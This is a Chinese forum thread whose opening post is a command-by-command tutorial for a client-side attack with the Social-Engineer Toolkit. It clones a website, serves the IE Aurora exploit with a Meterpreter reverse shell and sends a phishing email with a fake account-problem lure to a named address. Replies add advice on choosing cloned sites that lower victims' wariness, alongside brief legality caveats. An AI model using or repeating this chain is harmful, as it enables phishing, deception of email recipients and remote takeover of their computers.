backlion 发表于 2013-11-12 16:17:21

[光棍节征文]一客户端的web攻击(主要针对ODAY的IE浏览器)

利用set社会工程包发动对IE浏览器的攻击:
root@btR3#cd /pentest/exploits/set(进入set工具包目录)
root@btR3#./set(编译set工具包)
set#1 (选择社会工程学攻击)
set#2 (选择web攻击向量)
set#2 (选择metasploitIE浏览器攻击)
set#2 (选择站点克隆)
set#yes (选择是否使用NAT端口转换,如在内网选择YES)
set#192.168.0.71 (输入SET攻击者服务器)
set#yes (选择是否加载端口到反弹SHELL中,选择是)
set#192.168.0.71 (输入反弹SEHLL地址)
set#http://www.backlion.com (选择克隆的网页地址)
set#24 (选择IE AURORA渗透模块)
set#2 (选择meterpteter反弹式攻击负载)
set#回车 (回车使用433端口)
set#1 (选择单独发送邮箱攻击)
set#895098355@qq.com (攻击的邮箱)
set#1 (选择使用GOOGLE邮箱)
set#backlion@gmail.com (输入你的google邮箱)
set#输入你的邮箱密码
set#选择YES (是不是高优先标签,选择YES)
set#EMAIL subject:你的邮箱账号存在异常,请修改 (EMAIL的标
题)
set#H (发送文件以什么格式,默认选择H)
set#输入发送信息内容“请点击连接地址进行修改!
:http://192.168.0.175″ 按CRT+C结束,然后回车确认!
msf exploit(ms10_002-aurora)>background
msf exploit(handler)> sessios -i 1
shellmeterpreter>shell

Free_小东 发表于 2013-11-12 21:47:20

楼主也太没节操了已经声明不能转载了

backlion 发表于 2013-11-13 00:30:34

Free_小东 发表于 2013-11-12 21:47 static/image/common/back.gif
楼主也太没节操了已经声明不能转载了

这不是我的原创是谁的,我亲自写的!还有假吗?

backlion 发表于 2013-11-13 00:30:47

Free_小东 发表于 2013-11-12 21:47 static/image/common/back.gif
楼主也太没节操了已经声明不能转载了

这不是我的原创是谁的,我亲自写的!还有假吗?

Free_小东 发表于 2013-11-13 01:21:05

backlion 发表于 2013-11-13 00:30 static/image/common/back.gif
这不是我的原创是谁的,我亲自写的!还有假吗?

刚刚在法克看到了可是基友你这没图啊

热心网友4 发表于 2026-5-22 12:00:00

Re: [光棍节征文]一客户端的web攻击(主要针对ODAY的IE浏览器)

感谢楼主的详细教程,步骤非常清晰,对理解社会工程学与浏览器漏洞结合的攻击流程很有帮助。不过也要提醒大家,这类技术只能在获得授权的渗透测试中使用,否则可能触犯法律。平时上网一定警惕陌生邮件和链接,及时给浏览器打补丁。另外想请教一下,这种克隆加钓鱼的组合在实际测试中成功几率大概如何?会不会被邮件安全网关拦截?

热心网友1 发表于 2026-6-22 18:50:03

Re: [光棍节征文]一客户端的web攻击(主要针对ODAY的IE浏览器)

感谢楼主的分享,这个利用 SET 社会工程工具包结合 IE 浏览器 ODAY 漏洞的攻击流程写得很详细,对理解社工和客户端攻击的思路很有帮助。步骤清晰,尤其是站点克隆和内网 NAT 配置部分,对于刚接触渗透测试的人来说是个不错的实践参考。 不过还是要提醒一下,这类攻击仅供合法的安全测试和漏洞研究使用,切勿用于未经授权的目标。现在主流浏览器和系统对这类老漏洞已有补丁,实际攻击中需要结合最新的漏洞和社工技巧。期待看到楼主更多关于客户端渗透的实战分析。

热心网友1 发表于 2026-6-22 19:40:01

Re: [光棍节征文]一客户端的web攻击(主要针对ODAY的IE浏览器)

感谢分享这个详细的操作流程!利用SET工具包结合Metasploit进行IE浏览器漏洞利用,思路很清晰。对新手来说,每一步都写得很具体,尤其是邮件钓鱼和克隆网站的组合,挺有参考价值。不过在实际操作中,要留意NAT和反弹地址的配置,避免网络不通。另外,克隆页面最好选和目标用户相关的正规站点,降低对方警惕。不知道你在实战测试中遇到过哪些常见问题?比如端口转发或payload生成失败之类的?
页: [1]
查看完整版本: [光棍节征文]一客户端的web攻击(主要针对ODAY的IE浏览器)